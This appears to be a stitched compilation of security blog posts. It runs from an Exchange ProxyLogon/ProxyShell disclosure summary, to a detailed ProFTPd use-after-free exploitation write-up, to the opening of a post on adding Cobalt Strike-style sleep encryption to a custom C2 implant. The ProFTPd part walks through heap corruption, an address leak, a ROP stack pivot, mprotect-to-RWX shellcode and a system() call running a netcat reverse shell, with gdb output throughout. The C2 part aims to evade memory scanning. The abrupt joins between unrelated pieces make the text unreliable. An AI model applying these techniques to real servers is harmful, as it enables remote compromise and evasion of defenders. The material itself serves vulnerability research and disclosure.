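Microsoft Exchange Server, one of the most common email solutions in the world today, has become an almost indispensable part of daily operations and security for enterprises and governments. In January this year, we reported a series of Exchange Server vulnerabilities to Microsoft and named them ProxyLogon. If you follow industry news, you have surely heard the name. ProxyLogon may be the most severe and most impactful vulnerability in the history of Exchange!
As we researched ProxyLogon more deeply at the architectural level, we found that it is not just a single vulnerability but an entirely new attack surface that nobody had discussed before, one that hackers and security researchers can mine for more vulnerabilities. We therefore focused on this attack surface and found at least eight vulnerabilities in it, spanning server-side, client-side, and even cryptographic bugs, and combined them into three attack chains:
All the vulnerabilities we found are logic bugs, which means they are easier to reproduce and exploit than memory corruption bugs. We presented the results at Black Hat USA and DEFCON, and also won the 2021 Pwnie Award for Best Server-Side Bug. If you are interested, you can download the conference slides here!
All the vulnerabilities mentioned here were reported to Microsoft through a responsible disclosure process and have been fixed. The table below lists the CVE numbers and the reporting timeline.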
Report Time | Name | CVE | Patch Time | CAS[1] | Reported By |
---|---|---|---|---|---|
Jan 05, 2021 | ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | Yes | Orange Tsai, Volexity and MSTIC |
Jan 05, 2021 | ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | - | Orange Tsai, Volexity and MSTIC |
Jan 17, 2021 | ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Yes | Orange Tsai |
Jan 17, 2021 | ProxyOracle | CVE-2021-31195 | May 11, 2021 | - | Orange Tsai |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34473 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34523 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-31207 | May 11, 2021 | - | Orange Tsai working with ZDI |
Jun 02, 2021 | - | - | - | Yes | Orange Tsai |
Jun 02, 2021 | - | CVE-2021-33768 | Jul 13, 2021 | - | Orange Tsai and Dlive |
We are publishing the more detailed technical write-ups one by one; the links will be kept up to date in this post, so stay tuned:
Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and it can lead to Post-Auth Remote Code Execution. Please, take a seat and listen to the story.
This post will analyze the vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc).
First of all I want to mention:
`gid_tab->pool`, which is the one I decided to use in the exploit (explained later in this post)
To trigger the vulnerability, we first need to start a new data channel transfer, then interrupt it through the command channel while the data channel is still open.
Using the data channel, we can fill heap memory to overwrite the `resp_pool` struct, which is `session.curr_cmd_rec->pool` at this time.
The result of triggering the vulnerability successfully is full control over `resp_pool`:
gef➤ p p
$3 = (struct pool_rec *) 0x555555708220
gef➤ p resp_pool
$4 = (pool *) 0x555555708220
gef➤ p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➤ p *resp_pool
$6 = {
first = 0x4141414141414141,
last = 0x4141414141414141,
cleanups = 0x4141414141414141,
sub_pools = 0x4141414141414141,
sub_next = 0x4141414141414141,
sub_prev = 0x4141414141414141,
parent = 0x4141414141414141,
free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}
Obviously, as there are no valid pointers in the struct, we end up with a segmentation fault on this line of code:
first_avail = blok->h.first_avail
`blok`, which coincides with the `p->last` value, is `0x4141414141414141` at that time.
The ProFTPd pool allocator is the same as Apache's.
Allocations here take place using `palloc()` and `pcalloc()`, which are wrapper functions for `alloc_pool()`.
The ProFTPd pool allocator works with blocks, which are actual glibc heap chunks.
Each block has a `block_hdr` header structure that defines it:
union block_hdr {
union align a;
/* Padding */
#if defined(_LP64) || defined(__LP64__)
char pad[32];
#endif
/* Actual header */
struct {
void *endp;
union block_hdr *next;
void *first_avail;
} h;
};
- `blok->h.endp` points to the end of the current block
- `blok->h.next` points to the next block in a linked list
- `blok->h.first_avail` points to the first available memory within this block
This is the `alloc_pool()` code:
static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {
size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
size_t sz = nclicks * CLICK_SZ;
union block_hdr *blok;
char *first_avail, *new_first_avail;
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
if (reqsz == 0) {
errno = EINVAL;
return NULL;
}
new_first_avail = first_avail + sz;
if (new_first_avail <= (char *) blok->h.endp) {
blok->h.first_avail = new_first_avail;
return (void *) first_avail;
}
pr_alarms_block();
blok = new_block(sz, exact);
p->last->h.next = blok;
p->last = blok;
first_avail = blok->h.first_avail;
blok->h.first_avail = sz + (char *) blok->h.first_avail;
pr_alarms_unblock();
return (void *) first_avail;
}
As we can see, it first tries to use memory within the same block. If there is no space left, it allocates a new block with `new_block()` and updates the pool's last block in `p->last`.
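To make the fast path concrete, here is a minimal toy model of the bump allocation inside a single block. It is only a sketch: the `toy_` names and the 8-byte `TOY_CLICK_SZ` are assumptions for illustration, and the chaining of a new block is replaced by returning `NULL`.

```c
#include <stddef.h>

#define TOY_CLICK_SZ 8 /* assumed rounding unit; the real CLICK_SZ lives in pool.c */

struct toy_block {
    char *endp;        /* one past the last usable byte of the block */
    char *first_avail; /* next free byte inside the block */
};

/* Bump allocation within one block. Returns NULL when the request does
 * not fit (the real allocator would chain a new block at this point). */
void *toy_alloc(struct toy_block *blok, size_t reqsz) {
    if (blok == NULL || reqsz == 0)
        return NULL;
    /* Round the request up to a multiple of the click size. */
    size_t nclicks = 1 + ((reqsz - 1) / TOY_CLICK_SZ);
    size_t sz = nclicks * TOY_CLICK_SZ;
    if ((size_t)(blok->endp - blok->first_avail) < sz)
        return NULL;
    char *res = blok->first_avail;
    blok->first_avail += sz; /* the only state change: move the boundary */
    return res;
}
```

The point to take away is that the returned address is simply whatever `first_avail` holds, which is why controlling that field matters later on.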
Pool headers, defined by the `pool_rec` structure, are stored right after the header of the first block created for that pool, as we can see in `make_sub_pool()`, which creates a new pool:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
Actually, `make_sub_pool()` is also responsible for creating the permanent pool, which has no parent; `p` will be `NULL` in that case.
Looking at the `make_sub_pool()` code, you can see that it gets a new block, places the `pool_rec` header right after the `block_hdr` header, and updates `blok->h.first_avail` to point right after it.
Then the entries of the newly created pool are initialized.
The `p->cleanups` entry is a pointer to a `cleanup_t` struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
Cleanups are registered with the function `register_cleanup()` and run by the function `run_cleanups()`.
A chain of blocks can be freed using `free_blocks()`:
static void free_blocks(union block_hdr *blok, const char *pool_tag) {
union block_hdr *old_free_list = block_freelist;
if (!blok)
return;
block_freelist = blok;
while (blok->h.next) {
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok = blok->h.next;
}
chk_on_blk_list(blok, old_free_list, pool_tag);
blok->h.first_avail = (char *) (blok + 1);
blok->h.next = old_free_list;
}
We have control over a really interesting `pool_rec` struct. Now we need to search for primitives that allow us to get something useful out of this vulnerability, like Remote Code Execution.
Obviously, predictable memory addresses are a requirement before any primitive can be used, since in this case exploitation consists of playing with pointers, structs and memory writes.
Leaking memory addresses in this situation is really hard, as we are in a cleanup/session-finishing process, and to trigger the vulnerability we actually need to generate an interruption.
I first thought about reading the `/proc/self/maps` file, which can be read by any process, even with low privileges.
In theory it would work, but unfortunately ProFTPd uses the `stat` syscall to retrieve the file size. As `stat` on pseudo-files like `maps` returns zero, this breaks the transfer, and 0 bytes are returned to the client on the data channel.
Thinking about additional ways to do it, I remembered `mod_copy`, a ProFTPd module that allows you to copy files within the server.
We can use `mod_copy` to copy the file from `/proc/self/maps` to `/tmp`, and once there, perform a normal transfer of the copy in `/tmp`, which is no longer a pseudo-file, so the content of `/proc/self/maps` is returned to the attacker.
This leak is really interesting, as it gives you addresses for every segment and even the filenames of the shared libraries, which sometimes contain versions like `libc-2.31.so`. This matters for exploit reliability, since we can use offsets for specific libc versions.
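Once the copy of the maps file has been downloaded, each line has to be turned into a base address and a path. The following is a minimal sketch of that parsing step, not the code from the exploit: `parse_maps_line` is a hypothetical helper, it ignores paths containing spaces, and the addresses used to try it out are made up.

```c
#include <stdio.h>
#include <string.h>

/* Parse one line of a /proc/<pid>/maps dump, for example:
 *   "7f875a9d7000-7f875a9f9000 r--p 00000000 08:01 1234 /usr/lib/libc-2.31.so"
 * Returns 1 on success and fills start, end, perms (at least 5 bytes) and
 * path (path_len bytes, empty when the mapping is anonymous); 0 otherwise. */
int parse_maps_line(const char *line, unsigned long long *start,
                    unsigned long long *end, char perms[5],
                    char *path, size_t path_len) {
    char tmp[256] = "";
    /* Offset, device and inode are skipped with suppressed conversions. */
    int n = sscanf(line, "%llx-%llx %4s %*s %*s %*s %255s",
                   start, end, perms, tmp);
    if (n < 3)
        return 0;
    if (path_len > 0) {
        strncpy(path, tmp, path_len - 1);
        path[path_len - 1] = '\0';
    }
    return 1;
}
```

With the start address of the libc mapping in hand, a fixed offset for that specific libc version gives the address of any function or gadget inside it.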
We have to transform our control over `session.curr_cmd_rec->pool` into a write primitive that lets us reach `run_cleanups()` with an arbitrary `cleanup_t` struct.
Looking for writes to struct entries, I found nothing that would give us a direct write-what-where primitive (which would have made things a lot easier).
Instead, the only way we can write something to an arbitrary address is through `make_sub_pool()` (at `pool.c:415`), which is called with `cmd->pool` as argument at some point:
struct pool_rec *make_sub_pool(struct pool_rec *p) {
union block_hdr *blok;
pool *new_pool;
pr_alarms_block();
blok = new_block(0, FALSE);
new_pool = (pool *) blok->h.first_avail;
blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;
memset(new_pool, 0, sizeof(struct pool_rec));
new_pool->free_first_avail = blok->h.first_avail;
new_pool->first = new_pool->last = blok;
if (p) {
new_pool->parent = p;
new_pool->sub_next = p->sub_pools;
if (new_pool->sub_next)
new_pool->sub_next->sub_prev = new_pool;
p->sub_pools = new_pool;
}
pr_alarms_unblock();
return new_pool;
}
This function is called at `main.c:287` from the `_dispatch()` function with our controlled pool as argument:
...
if (cmd->tmp_pool == NULL) {
cmd->tmp_pool = make_sub_pool(cmd->pool);
pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
}
...
As you can see, `new_pool->sub_next` now has the value of `p->sub_pools`, which we control, and then the `new_pool` pointer is written to `new_pool->sub_next->sub_prev`.
This means we can write the value of `new_pool` to any arbitrary address. At first sight this does not seem very useful, as the only relationship we have with the newly created pool `cmd->tmp_pool` is that `cmd->tmp_pool->parent` is equal to `resp_pool`, since we are its parent pool.
Also, the only value we control is `new_pool->sub_next`, which we actually use for the write primitive.
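The write primitive can be modelled in isolation. In this sketch the field order of `toy_pool` follows the `pool_rec` dump shown by gdb earlier; the `toy_` names and the helper `fake_sub_pools_for` are hypothetical and exist only to show how the destination of the write is chosen.

```c
#include <stddef.h>

/* Same field order as the pool_rec dump shown by gdb earlier. */
struct toy_pool {
    void *first, *last, *cleanups;
    struct toy_pool *sub_pools, *sub_next, *sub_prev, *parent;
    char *free_first_avail;
    const char *tag;
};

/* The linking step of make_sub_pool(), isolated from the allocation. */
void toy_link_sub_pool(struct toy_pool *parent, struct toy_pool *new_pool) {
    new_pool->parent = parent;
    new_pool->sub_next = parent->sub_pools;      /* attacker-controlled value */
    if (new_pool->sub_next)
        new_pool->sub_next->sub_prev = new_pool; /* pointer write happens here */
    parent->sub_pools = new_pool;
}

/* Value to place in parent->sub_pools so that the write lands on *target. */
struct toy_pool *fake_sub_pools_for(struct toy_pool **target) {
    return (struct toy_pool *)((char *)target -
                               offsetof(struct toy_pool, sub_prev));
}
```

Note that only the destination is chosen by the attacker; the value written is always the address of the freshly created pool.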
What more interesting primitives do we have?
In a previous section we explained how the ProFTPd pool allocator works. When a new pool is created, `p->first` and `p->last` point to the blocks used for the pool. We are interested in `p->last`, as it is the block that is actually used, as we can see in `alloc_pool()` at `pool.c:570`:
...
blok = p->last;
if (blok == NULL) {
errno = EINVAL;
return NULL;
}
first_avail = blok->h.first_avail;
...
`first_avail` is the pointer to the boundary between used data and available free space, which is where we will start to allocate memory.
Our pool is passed to `pstrdup()` multiple times for string allocation:
char *pstrdup(pool *p, const char *str) {
char *res;
size_t len;
if (p == NULL ||
str == NULL) {
errno = EINVAL;
return NULL;
}
len = strlen(str) + 1;
res = palloc(p, len);
if (res != NULL) {
sstrncpy(res, str, len);
}
return res;
}
This function calls `palloc()`, which ends up calling `alloc_pool()`.
The allocations are mostly non-controllable strings, which do not seem useful to us, except for one allocation at `cmd.c:373` in the function `pr_cmd_get_displayable_str()`:
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
As you can see, `cmd->pool` (our controlled pool) is passed to `pstrdup()`, and as seen at `cmd.c:363`:
...
if (argc > 0) {
register unsigned int i;
res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);
for (i = 1; i < argc; i++) {
res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
}
}
...
`res` points to the last command we sent:
...
if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
pstrdup(cmd->pool, res), 0) < 0) {
if (errno != EEXIST) {
pr_trace_msg(trace_channel, 4,
"error setting 'displayable-str' command note: %s", strerror(errno));
}
}
...
This means that if we send arbitrary data instead of a command, we can place custom data in the pool block space. As we can corrupt `p->last`, we can make `blok->h.first_avail` point to any address we want, which means we can overwrite any data through a command.
Unfortunately, this is not like our corruption from the data channel: here our commands are treated as strings, not as binary data as on the data channel.
This means we are very limited when overwriting structs or other useful data.
Also, some allocations happen earlier, so the heap between the initial value of `blok->h.first_avail` and its value when our command is `pstrdup()`'ed will be full of strings and invalid pointers, which could easily cause a crash before reaching `run_cleanups()`.
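A toy model shows both the power and the limitation of this second primitive. The names below (`toy_block`, `toy_pstrdup`) are illustrative stand-ins, and the real `pstrdup()` goes through `palloc()` with size rounding that is left out here.

```c
#include <stddef.h>
#include <string.h>

struct toy_block {
    char *endp;        /* end of the (fake) block */
    char *first_avail; /* attacker-chosen destination */
};

/* Simplified pstrdup(): the string is copied to wherever first_avail
 * points, so a forged block header decides where the data lands. */
char *toy_pstrdup(struct toy_block *blok, const char *str) {
    size_t len = strlen(str) + 1; /* copying stops at the first NUL byte */
    if ((size_t)(blok->endp - blok->first_avail) < len)
        return NULL;
    char *res = blok->first_avail;
    memcpy(res, str, len);
    blok->first_avail += len;
    return res;
}
```

Because the length comes from `strlen()`, nothing after the first NUL byte of the command is ever copied, which is the string limitation described above.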
Initially, I decided to use `blok->h.first_avail` to overwrite the `cmd->tmp_pool` entries with arbitrary data.
This pool is freed with `destroy_pool()` at `main.c:409` in the function `_dispatch()`:
...
destroy_pool(cmd->tmp_pool);
cmd->tmp_pool = NULL;
...
This means that if we control the `cmd->tmp_pool->cleanups` value when reaching `clear_pool()`, we have the ability to control RIP and RDI once `run_cleanups()` is called:
void destroy_pool(pool *p) {
if (p == NULL) {
return;
}
pr_alarms_block();
if (p->parent) {
if (p->parent->sub_pools == p) {
p->parent->sub_pools = p->sub_next;
}
if (p->sub_prev) {
p->sub_prev->sub_next = p->sub_next;
}
if (p->sub_next) {
p->sub_next->sub_prev = p->sub_prev;
}
}
clear_pool(p);
free_blocks(p->first, p->tag);
pr_alarms_unblock();
}
As you can see, `clear_pool()` is called, but only after accessing some of the entries of the pool, which must be either `NULL` or a valid writable address.
Once `clear_pool()` is called:
static void clear_pool(struct pool_rec *p) {
/* Sanity check. */
if (p == NULL) {
return;
}
pr_alarms_block();
run_cleanups(p->cleanups);
p->cleanups = NULL;
while (p->sub_pools) {
destroy_pool(p->sub_pools);
}
p->sub_pools = NULL;
free_blocks(p->first->h.next, p->tag);
p->first->h.next = NULL;
p->last = p->first;
p->first->h.first_avail = p->free_first_avail;
pr_alarms_unblock();
}
We can see that `run_cleanups()` is called directly, without further checks or memory writes.
When the function `run_cleanups()` is called:
static void run_cleanups(cleanup_t *c) {
while (c) {
if (c->plain_cleanup_cb) {
(*c->plain_cleanup_cb)(c->data);
}
c = c->next;
}
}
Looking at the `cleanup_t` struct:
typedef struct cleanup {
void *data;
void (*plain_cleanup_cb)(void *);
void (*child_cleanup_cb)(void *);
struct cleanup *next;
} cleanup_t;
We can control RIP with `c->plain_cleanup_cb` and RDI with `c->data`.
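The effect is easy to reproduce in a harmless toy model. The loop is the same as in `run_cleanups()` above; `toy_target` is a hypothetical stand-in for whatever function the attacker picks (for example `system()`), and it only records the argument it receives.

```c
#include <stddef.h>

typedef struct toy_cleanup {
    void *data;                       /* becomes the first argument (RDI) */
    void (*plain_cleanup_cb)(void *); /* becomes the call target (RIP) */
    void (*child_cleanup_cb)(void *);
    struct toy_cleanup *next;
} toy_cleanup_t;

/* Same loop as run_cleanups(): no validation of the callback pointer. */
void toy_run_cleanups(toy_cleanup_t *c) {
    while (c) {
        if (c->plain_cleanup_cb)
            (*c->plain_cleanup_cb)(c->data);
        c = c->next;
    }
}

/* Harmless stand-in for an attacker-chosen function. */
int toy_calls = 0;
void *toy_last_arg = NULL;
void toy_target(void *arg) {
    toy_calls++;
    toy_last_arg = arg;
}
```

Whoever controls the memory a `cleanup_t` pointer refers to decides both the function that gets called and its first argument. In the real exploit `next` must also be `NULL` or point to another valid entry, otherwise the loop keeps walking.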
Unfortunately, corrupting `cmd->tmp_pool` is difficult, as the string `displayable-str` is appended right after our controllable data, and right after our `p->cleanups` entry there are some entries that are accessed in `destroy_pool()` before reaching `run_cleanups()`.
@DUKPT_, who is also working on a PoC for this vulnerability, was overwriting `gid_tab->pool`. This is a more reliable technique, as there are no pointers after our controllable data, so nothing serious breaks when `displayable-str` is appended. Also, instead of corrupting a `pool_rec` structure, here we corrupt a `pr_table_t` structure, so we can point `gid_tab->pool` to memory corrupted from the data channel, which accepts NULL bytes. There we can craft a fake `pool_rec` structure whose `p->cleanups` value points to a fake `cleanup_t` struct, which will finally be passed to `run_cleanups()`.
What also makes `gid_tab` interesting is that `gid_tab->pool` is passed to `destroy_pool()` in `pr_table_free()`, which is called with `gid_tab` as argument:
int pr_table_free(pr_table_t *tab) {
if (tab == NULL) {
errno = EINVAL;
return -1;
}
if (tab->nents != 0) {
errno = EPERM;
return -1;
}
destroy_pool(tab->pool);
return 0;
}
This is what `pr_table_t` looks like:
struct table_rec {
pool *pool;
unsigned long flags;
unsigned int seed;
unsigned int nmaxents;
pr_table_entry_t **chains;
unsigned int nchains;
unsigned int nents;
pr_table_entry_t *free_ents;
pr_table_key_t *free_keys;
pr_table_entry_t *tab_iter_ent;
pr_table_entry_t *val_iter_ent;
pr_table_entry_t *cache_ent;
int (*keycmp)(const void *, size_t, const void *, size_t);
unsigned int (*keyhash)(const void *, size_t);
void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};
...
typedef struct table_rec pr_table_t;
As you can see, the entries after `tab->pool` (`tab->flags`, `tab->seed` and `tab->nmaxents`) are not pointers, so the appended string will not trigger crashes.
So, what is the plan?
1) Craft a fake `block_hdr` structure that will be pointed to by `p->last`
2) Place in `fake_blok->h.first_avail` a pointer to `gid_tab` minus some offset, where the offset depends on the number of allocations and their sizes, so that when `pstrdup()` copies our arbitrary command, the value of `fake_blok->h.first_avail` is exactly the address of `gid_tab`
3) Place in `p->sub_next` the address of `tab->chains`, so that when `pr_table_kget()` is called, `NULL` is returned and our arbitrary command gets allocated
4) Send a custom command containing a fake `pr_table_t` (actually only `tab->pool` is needed), and point `fake_tab->pool` to a fake `pool_rec` struct
5) Craft the fake `pool_rec` struct: point `fake_pool->parent`, `fake_pool->sub_next` and `fake_pool->sub_prev` to any writable address, and `fake_pool->cleanups` to a fake `cleanup_t` struct containing our arbitrary RIP and RDI values
This is the result of exploiting the hijack technique:
*0x4242424242424242 (
$rdi = 0x4141414141414141,
$rsi = 0x0000000000000000,
$rdx = 0x4242424242424242,
$rcx = 0x0000555555579c00 → <entry_remove+0> endbr64
)
As you can see, `c->plain_cleanup_cb` has the value `0x4242424242424242`, and `c->data` has the value `0x4141414141414141`.
This means RIP and RDI are fully controlled.
As explained, our main target is reaching the `run_cleanups()` function with an arbitrary address, or with a non-arbitrary address whose content we control. This allows us to obtain full RIP and RDI control which, taking into account that we already have predictable addresses for every segment, means Remote Code Execution is likely to be possible.
Some ways to obtain Remote Code Execution:
As we control both RIP and RDI, we could search for useful gadgets that would allow us to redirect control-flow using a ROPchain to bypass NX.
When reaching `run_cleanups()`:
gef➤ p *c
$7 = {
data = 0x563593915280,
plain_cleanup_cb = 0x7f875ab201a1 <authnone_marshal+17>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/2i c->plain_cleanup_cb
0x7f875ab201a1 <authnone_marshal+17>: push rdi
0x7f875ab201a2 <authnone_marshal+18>: pop rsp
gef➤
When entering the stack pivot gadget:
→ 0x7f875ab201a1 <authnone_marshal+17> push rdi
0x7f875ab201a2 <authnone_marshal+18> pop rsp
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
0x7f875ab201ae <authnone_marshal+30> jmp rax
We previously crafted our `resp_pool` struct so that `rax` points to memory where the address of a `ret` instruction is stored at offset `0x18`. So when:
mov rax, QWORD PTR [rax+0x18]
is executed, that address is loaded into `rax` and used by the very next instruction: `jmp rax`.
As it lands on a `ret` instruction, we finally execute our ROPchain, since `rsp` was pointed at the start of our ROPchain and a `ret` instruction just got executed.
gef➤ p $rax
$5 = 0x563593915358
gef➤ x/gx $rax + 0x18
0x563593915370: 0x00007f875a9fc679
gef➤ x/i 0x00007f875a9fc679
0x7f875a9fc679 <__libgcc_s_init+61>: ret
At the time of `jmp rax`:
0x7f875ab201a3 <authnone_marshal+19> lea rsi, [rdi+0x48]
0x7f875ab201a7 <authnone_marshal+23> mov rdi, r8
0x7f875ab201aa <authnone_marshal+26> mov rax, QWORD PTR [rax+0x18]
→ 0x7f875ab201ae <authnone_marshal+30> jmp rax
0x7f875ab201b0 <authnone_marshal+32> xor eax, eax
0x7f875ab201b2 <authnone_marshal+34> ret
--------------------------------------------------------------
gef➤ p $rax
$6 = 0x7f875a9fc679
gef➤ x/i $rax
0x7f875a9fc679 <__libgcc_s_init+61>: ret
And we can see stack was pivoted successfully:
gef➤ p $rsp
$7 = (void *) 0x563593915358
gef➤ x/gx 0x563593915358
0x563593915358: 0x00007f875aa21550
gef➤ x/i 0x00007f875aa21550
0x7f875aa21550 <mblen+112>: pop rax
The ROPchain sets up a syscall to `SYS_mprotect`, which changes the memory protection of a heap range to `RWX`. Then we jump into the shellcode, finally achieving Remote Code Execution.
If we check the mappings with gdb, we can see that part of the heap is now `RWX`, which is where the shellcode resides:
0x0000563593889000 0x00005635938cb000 0x0000000000000000 rw- [heap]
0x00005635938cb000 0x0000563593915000 0x0000000000000000 rw- [heap]
0x0000563593915000 0x0000563593916000 0x0000000000000000 rwx [heap]
0x0000563593916000 0x000056359394e000 0x0000000000000000 rw- [heap]
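The `rwx` range in the listing is a single page, which fits the fact that `mprotect` requires a page-aligned start address. As a small sketch of how such arguments can be derived from a shellcode address, assuming 4 KiB pages (the helper names and the shellcode length used to try it out are hypothetical):

```c
#include <stdint.h>

#define TOY_PAGE_SIZE 0x1000ULL /* assumed 4 KiB pages */

/* Start of the page that contains addr. */
uint64_t page_align_down(uint64_t addr) {
    return addr & ~(TOY_PAGE_SIZE - 1);
}

/* Number of bytes, counted from the aligned base, needed to cover
 * the range [addr, addr + len). Always a multiple of the page size. */
uint64_t page_span(uint64_t addr, uint64_t len) {
    uint64_t base = page_align_down(addr);
    uint64_t end = (addr + len + TOY_PAGE_SIZE - 1) & ~(TOY_PAGE_SIZE - 1);
    return end - base;
}
```

For the shellcode address `0x563593915310` seen in the next listing, `page_align_down` gives `0x563593915000`, which matches the start of the `rwx` mapping above.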
Now we jump to the shellcode, which resides in executable memory, so Remote Code Execution succeeds:
0x7f875aa3d229 <funlockfile+73> syscall
→ 0x7f875aa3d22b <funlockfile+75> ret
↳ 0x563593915310 push 0x29
0x563593915312 pop rax
0x563593915313 push 0x2
0x563593915315 pop rdi
0x563593915316 push 0x1
0x563593915318 pop rsi
Chaining all this together into an exploit, this is a screenshot of the successful exploitation of this vulnerability using the ROP approach:
You can jump to any function and control one argument, which means you can call any function with an arbitrary first argument. You can reuse existing register values for the other arguments as well, but then you rely on the current registers being valid for the target function; for example, an invalid pointer would trigger a crash.
The approach I followed with this method is calling `system()` and pointing RDI to a custom command string (a netcat reverse shell) that I leave on the heap at a predictable address.
First we reach `destroy_pool()` with the fake `pool_rec` struct; we actually reuse entries from our initially controlled struct:
gef➤ p *p
$1 = {
first = 0x563f5c9c6280,
last = 0x7361626174614472,
cleanups = 0x563f5c9a62d0,
sub_pools = 0x563f5c9a6298,
sub_next = 0x563f5c9a62a0,
sub_prev = 0x563f5c9a0a90,
parent = 0x563f5c94a738,
free_first_avail = 0x563f5c94a7e0 "\260\251\224\\?V",
tag = 0x563f5c9a526e ""
}
gef➤ p *resp_pool
$2 = {
first = 0x563f5c9a62d0,
last = 0x563f5c9a6298,
cleanups = 0x563f5c9a62a0,
sub_pools = 0x563f5c9a0a90,
sub_next = 0x563f5c94a738,
sub_prev = 0x563f5c94a7e0,
parent = 0x563f5c9a526e,
free_first_avail = 0x563f5c9a526e "",
tag = 0x563f5c9a526e ""
}
Then `destroy_pool()` calls `clear_pool()`, which finally ends up calling `run_cleanups()` with our fake `cleanup_t` struct, pointed to by `p->cleanups`:
gef➤ p *c
$3 = {
data = 0x563f5c9a62f0,
plain_cleanup_cb = 0x7fca503f1410 <__libc_system>,
child_cleanup_cb = 0x4141414141414141,
next = 0x4242424242424242
}
gef➤ x/s c->data
0x563f5c9a62f0: "nc -e/bin/bash 127.0.0.1 4444"
As we can see, `c->plain_cleanup_cb` (the future RIP) points to `__libc_system()`, and `c->data` points to our command string stored on the heap.
If we continue, the result is the execution of a new process as part of the command execution: `process 35209 is executing new program: /usr/bin/ncat`
And finally we obtain a reverse shell as the user we logged into the FTP server with.
RCE Video Demo also available on GitHub (same directory where the exploit resides)
You can find the GitHub issue and patches for this vulnerability here.
In this post we analyzed and demonstrated exploitation of a Use-After-Free in ProFTPd, and got full Remote Code Execution even with all the protections turned on (ASLR, PIE, NX, RELRO, STACKGUARD etc).
Although authentication is needed, an attacker sometimes already has valid credentials but cannot go any further without an RCE exploit like this.
You can find the ROP approach exploit here.
You can find the other exploit using `system()` and netcat here.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
This is a guest post that DEVCORE wrote in collaboration with Zero Day Initiative (ZDI) and published on their blog, describing the exploit chain we demonstrated at Pwn2Own 2021! Please visit the following link to read it :)
If you are interested in more Exchange Server attacks, you can also check our series of articles:
With ProxyShell, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server through an exposed 443 port! Here is the demonstration video:
In the course of building a custom C2 framework, I frequently find features from other frameworks I’d like to implement. Cobalt Strike is obviously a major source of inspiration, given its maturity and large feature set. The only downside to re-implementing features from a commercial C2 is that you have no code or visibility into how a feature is implemented. This downside is also an excellent learning opportunity.
One such feature is Beacon’s ability to encrypt its loaded image in memory while it sleeps. It does this to prevent memory scanning from identifying static data and other possible indicators within the image while Beacon is inactive. Since during sleep no code or data is used, it can be encrypted, and only decrypted and visible in memory for the shortest time necessary. Another similar idea is heap encryption, which encrypts any dynamically allocated memory during sleep. A great writeup on this topic was published recently by Waldo-IRC and is available here.
So I set out to create a proof of concept to encrypt the loaded image of a process periodically while that process is sleeping, similar to how a Beacon or implant would.
The code for this post is available here.
To get an idea of the challenges we have to overcome, let’s examine how an image is situated in memory when a process is running.
During process creation, the Windows loader takes the PE file from disk and maps it into memory. The PE headers tell the loader about the number of sections the file contains, their sizes, memory protections, etc. Using this information, each section is mapped by the loader into an area of memory, and that memory is given a specific memory protection value. These values can be a combination of read, write, and execute, along with a bunch of other values that aren’t relevant for now. The various sections tend to have consistent memory protection values; for instance, the `.text` section contains most of the executable code of the program, and as such needs to be read and executed, but not written to. Thus its memory is given Read eXecute protections. The `.rdata` section, however, contains read-only data, so it is given only Read memory protection.
Why do we care about the memory protection of the different PE sections? Because we want to encrypt them, and to do that, we need to be able to both read and write to them. By default, most sections are not writable. So we will need to change the protections of each section to at least RW, and then change them back to their original protection values. If we don’t change them back to their proper values, the program could possibly crash or look suspicious in memory. Every single section being writable is not a common occurrence!
